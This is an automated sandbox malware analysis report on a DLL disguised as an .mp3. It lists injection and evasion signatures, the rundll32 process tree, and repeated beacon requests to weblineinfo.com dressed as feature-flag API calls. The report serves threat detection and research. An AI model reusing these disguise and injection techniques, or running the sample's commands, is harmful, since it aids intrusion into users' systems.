Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
10kmr9d7.dll

Overview

General Information

Sample name:10kmr9d7.dll
(renamed file extension from mp3 to dll)
Original sample name:10kmr9d7.mp3
Analysis ID:1490633
MD5:7abbf9f2106c2dd1e69110c6c6b8dbc6
SHA1:05cf0a54c0e62d170b6ff9bb0108b70164a0e681
SHA256:44f5ebb4facaba45274f08437a1f980bbbdb209cbd016ead76e4ec1afaca4dc2
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll64.exe (PID: 3504 cmdline: loaddll64.exe "C:\Users\user\Desktop\10kmr9d7.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6412 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5812 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5908 cmdline: rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3480 cmdline: rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Create MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4028 cmdline: rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Destroy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5996 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperations MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6112 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Create MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6460 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Destroy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 180 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4524 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4448 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5316 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicData MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4124 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_Delete MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1960 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLL MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 760 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevel MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4440 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallback MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5332 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 984 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActions MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 616 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterReboot MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6576 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdate MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 3160 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoaded MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6584 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLL MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4052 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersion MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4720 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersion MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6172 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1848 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreats MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6508 cmdline: rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdate MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180015BF0 BCryptOpenAlgorithmProvider,BCryptImportKeyPair,BCryptVerifySignature,BCryptDestroyKey,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_0000000180015BF0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180015700 Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,BCryptOpenAlgorithmProvider,BCryptGetProperty,BCryptGetProperty,BCryptCreateHash,BCryptHashData,BCryptFinishHash,BCryptCloseAlgorithmProvider,BCryptDestroyHash,6_2_0000000180015700
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180015F90 BCryptOpenAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptImportKeyPair,BCryptVerifySignature,BCryptDestroyKey,6_2_0000000180015F90
Source: unknownHTTPS traffic detected: 62.192.173.45:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 62.192.173.45:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: Binary string: D:\JENKINS\workspace\N_CleanActions\bin\x64\Release\ActionsShim.pdb source: rundll32.exe, 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.3272319252.0000000180154000.00000002.00000001.01000000.00000003.sdmp, 10kmr9d7.dll
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800143C0 GetLogicalDriveStringsW,QueryDosDeviceW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,6_2_00000001800143C0

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 62.192.173.45 443Jump to behavior
Source: Joe Sandbox ViewASN Name: HUGESERVER-NETWORKSUS HUGESERVER-NETWORKSUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 735Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 735Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 335Connection: Keep-AliveCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: weblineinfo.com
Source: unknownHTTP traffic detected: POST /flags/api/v2/frontend/experimentValues HTTP/1.1Accept: */*Content-Type: application/jsonX-Client-Name: feature-gate-js-clientX-Client-Version: 4.8.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: weblineinfo.comContent-Length: 735Connection: Keep-AliveCache-Control: no-cache
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD64000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2724309581.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/
Source: rundll32.exe, 00000006.00000003.2724449942.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273047761.000002357ADDB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2724309581.000002357ADDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/=cn
Source: rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/D
Source: rundll32.exe, 00000009.00000003.2515439108.000001B0A1B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues
Source: rundll32.exe, 00000006.00000003.2097914667.000002357ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues%$
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2515439108.000001B0A1B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues(
Source: rundll32.exe, 00000009.00000003.2515439108.000001B0A1B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValues.com
Source: rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesA
Source: rundll32.exe, 00000009.00000003.2515439108.000001B0A1B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesCX
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesFY
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157181635.000001B0A1B61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2515439108.000001B0A1B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesOIDInfo
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesS
Source: rundll32.exe, 00000006.00000003.2097977756.000002357ADAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesV
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesZ
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesich
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValueslk?
Source: rundll32.exe, 00000006.00000002.3273047761.000002357ADAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesp
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/flags/api/v2/frontend/experimentValuesps-
Source: rundll32.exe, 00000009.00000002.3272959794.000001B0A1B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/graphy
Source: rundll32.exe, 00000006.00000003.2376171753.000002357ADAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weblineinfo.com/r
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 62.192.173.45:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 62.192.173.45:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180015BF0 BCryptOpenAlgorithmProvider,BCryptImportKeyPair,BCryptVerifySignature,BCryptDestroyKey,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_0000000180015BF0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180015F90 BCryptOpenAlgorithmProvider,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptImportKeyPair,BCryptVerifySignature,BCryptDestroyKey,6_2_0000000180015F90
Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000002357C73D6CA NtProtectVirtualMemory,6_3_000002357C73D6CA
Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000002357C73D65A NtAllocateVirtualMemory,6_3_000002357C73D65A
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180006560 NtAllocateVirtualMemory,NtProtectVirtualMemory,6_2_0000000180006560
Source: C:\Windows\System32\rundll32.exeCode function: 9_3_000001B0A35AD6CA NtProtectVirtualMemory,9_3_000001B0A35AD6CA
Source: C:\Windows\System32\rundll32.exeCode function: 9_3_000001B0A35AD65A NtAllocateVirtualMemory,9_3_000001B0A35AD65A
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35CF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,9_2_000001B0A35CF3A0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E4740 NtFreeVirtualMemory,9_2_000001B0A35E4740
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E4360 NtCreateThreadEx,9_2_000001B0A35E4360
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E45F0 NtDuplicateObject,9_2_000001B0A35E45F0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C55C0 NtTerminateThread,9_2_000001B0A35C55C0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E51C0 NtReadVirtualMemory,9_2_000001B0A35E51C0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35B71B0 NtClose,9_2_000001B0A35B71B0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C7A50 NtSetContextThread,9_2_000001B0A35C7A50
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C8149 NtSetContextThread,9_2_000001B0A35C8149
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E4BE0 NtProtectVirtualMemory,9_2_000001B0A35E4BE0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018012A0006_2_000000018012A000
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001D606_2_0000000180001D60
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018012C8046_2_000000018012C804
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001801178AC6_2_00000001801178AC
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800150D06_2_00000001800150D0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001801310C86_2_00000001801310C8
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180118A106_2_0000000180118A10
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001801172906_2_0000000180117290
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180117AB06_2_0000000180117AB0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018012D3186_2_000000018012D318
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180126B046_2_0000000180126B04
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018011A3C06_2_000000018011A3C0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800143C06_2_00000001800143C0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018012CC986_2_000000018012CC98
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000FE056_2_000000018000FE05
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001801236106_2_0000000180123610
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800065606_2_0000000180006560
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001801176A06_2_00000001801176A0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180139F046_2_0000000180139F04
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C55C09_2_000001B0A35C55C0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35B66C09_2_000001B0A35B66C0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D66E09_2_000001B0A35D66E0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35CBED09_2_000001B0A35CBED0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D13A39_2_000001B0A35D13A3
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E1F409_2_000001B0A35E1F40
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35BA7309_2_000001B0A35BA730
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E2F609_2_000001B0A35E2F60
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D72209_2_000001B0A35D7220
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E02109_2_000001B0A35E0210
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C4DB09_2_000001B0A35C4DB0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35DB5E09_2_000001B0A35DB5E0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D55E09_2_000001B0A35D55E0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35B99D09_2_000001B0A35B99D0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C16A09_2_000001B0A35C16A0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C42A09_2_000001B0A35C42A0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D82A09_2_000001B0A35D82A0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35B95009_2_000001B0A35B9500
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35CA1009_2_000001B0A35CA100
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C91209_2_000001B0A35C9120
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35CB4E09_2_000001B0A35CB4E0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35B5D609_2_000001B0A35B5D60
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D45509_2_000001B0A35D4550
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E28129_2_000001B0A35E2812
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35DFBC09_2_000001B0A35DFBC0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D2BB09_2_000001B0A35D2BB0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35CCBE09_2_000001B0A35CCBE0
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35E14909_2_000001B0A35E1490
Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180106AE4 appears 53 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180107230 appears 65 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018003C440 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180005830 appears 51 times
Source: 10kmr9d7.dllBinary or memory string: OriginalFilenameActionsShim.dll8 vs 10kmr9d7.dll
Source: 10kmr9d7.dllStatic PE information: Section: .rsrc ZLIB complexity 0.9947324810606061
